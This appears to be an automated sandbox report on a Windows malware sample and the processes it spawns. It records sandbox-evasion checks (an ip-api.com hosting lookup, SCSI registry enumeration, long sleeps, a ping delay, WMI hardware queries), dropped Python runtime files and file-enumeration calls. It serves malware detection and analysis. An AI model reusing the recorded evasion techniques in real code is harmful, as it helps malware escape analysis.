                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.1
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_10-105338
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (5 occurrences)
                        Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 457
                        Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1429
                        Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 942
                        Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1773
                        Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 602
                        Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 589
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8502
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 847
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7573
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 687
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8082
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 611
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Dropped PE files which have not been started: the same 51 files were dropped under each of C:\Users\user\AppData\Local\Temp\_MEI35882\ and C:\Users\user\AppData\Local\Temp\_MEI43482\:
                            python312.dll, rar.exe
                            _bz2.pyd, _ctypes.pyd, _decimal.pyd, _hashlib.pyd, _lzma.pyd, _queue.pyd, _socket.pyd, _sqlite3.pyd, _ssl.pyd, select.pyd, unicodedata.pyd
                            api-ms-win-core-console-l1-1-0.dll, api-ms-win-core-datetime-l1-1-0.dll, api-ms-win-core-debug-l1-1-0.dll, api-ms-win-core-errorhandling-l1-1-0.dll, api-ms-win-core-file-l1-1-0.dll, api-ms-win-core-file-l1-2-0.dll, api-ms-win-core-file-l2-1-0.dll, api-ms-win-core-handle-l1-1-0.dll, api-ms-win-core-heap-l1-1-0.dll, api-ms-win-core-interlocked-l1-1-0.dll, api-ms-win-core-libraryloader-l1-1-0.dll, api-ms-win-core-localization-l1-2-0.dll, api-ms-win-core-memory-l1-1-0.dll, api-ms-win-core-namedpipe-l1-1-0.dll, api-ms-win-core-processenvironment-l1-1-0.dll, api-ms-win-core-processthreads-l1-1-0.dll, api-ms-win-core-processthreads-l1-1-1.dll, api-ms-win-core-profile-l1-1-0.dll, api-ms-win-core-rtlsupport-l1-1-0.dll, api-ms-win-core-string-l1-1-0.dll, api-ms-win-core-synch-l1-1-0.dll, api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-sysinfo-l1-1-0.dll, api-ms-win-core-timezone-l1-1-0.dll, api-ms-win-core-util-l1-1-0.dll
                            api-ms-win-crt-conio-l1-1-0.dll, api-ms-win-crt-convert-l1-1-0.dll, api-ms-win-crt-environment-l1-1-0.dll, api-ms-win-crt-filesystem-l1-1-0.dll, api-ms-win-crt-heap-l1-1-0.dll, api-ms-win-crt-locale-l1-1-0.dll, api-ms-win-crt-math-l1-1-0.dll, api-ms-win-crt-process-l1-1-0.dll, api-ms-win-crt-runtime-l1-1-0.dll, api-ms-win-crt-stdio-l1-1-0.dll, api-ms-win-crt-string-l1-1-0.dll, api-ms-win-crt-time-l1-1-0.dll, api-ms-win-crt-utility-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | API coverage: 4.6 %
                        Source: C:\Users\user\AppData\Roaming\wsruwii | API coverage: 2.2 %
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | API coverage: 1.5 %
                        Source: C:\Windows\explorer.exe TID: 6596 | Thread sleep count: 457 > 30
                        Source: C:\Windows\explorer.exe TID: 6824 | Thread sleep count: 1429 > 30
                        Source: C:\Windows\explorer.exe TID: 6824 | Thread sleep time: -142900s >= -30000s
                        Source: C:\Windows\explorer.exe TID: 6376 | Thread sleep count: 942 > 30
                        Source: C:\Windows\explorer.exe TID: 6376 | Thread sleep time: -94200s >= -30000s
                        Source: C:\Windows\explorer.exe TID: 6824 | Thread sleep count: 1773 > 30
                        Source: C:\Windows\explorer.exe TID: 6824 | Thread sleep time: -177300s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900 | Thread sleep count: 8502 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6232 | Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512 | Thread sleep count: 847 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828 | Thread sleep count: 7573 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4420 | Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756 | Thread sleep count: 687 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816 | Thread sleep count: 8082 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260 | Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6736 | Thread sleep count: 611 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5404 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS (2 occurrences)
                        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem (2 occurrences)
                        Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 occurrences)
                        Source: C:\Windows\explorer.exe | Last function: Thread delayed (2 occurrences)
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (9 occurrences)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed (2 occurrences)
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_00402902 FindFirstFileW,0_2_00402902
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_009FE472
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009FDC54
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A0A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A0A087
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A0A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A0A1E2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A0A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00A0A570
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A066DC FindFirstFileW,FindNextFileW,FindClose,10_2_00A066DC
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009CC622 FindFirstFileExW,10_2_009CC622
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00A073D4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A07333 FindFirstFileW,FindClose,10_2_00A07333
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009FD921
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A0A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A0A087
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A0A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A0A1E2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_009FE472
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A0A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00A0A570
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A066DC FindFirstFileW,FindNextFileW,FindClose,13_2_00A066DC
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009CC622 FindFirstFileExW,13_2_009CC622
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00A073D4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A07333 FindFirstFileW,FindClose,13_2_00A07333
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_009FD921
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_009FDC54
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_001BA087
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_001BA1E2
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,20_2_001AE472
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,20_2_001BA570
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001B66DC FindFirstFileW,FindNextFileW,FindClose,20_2_001B66DC
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001B7333 FindFirstFileW,FindClose,20_2_001B7333
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,20_2_001B73D4
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_001AD921
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_001ADC54
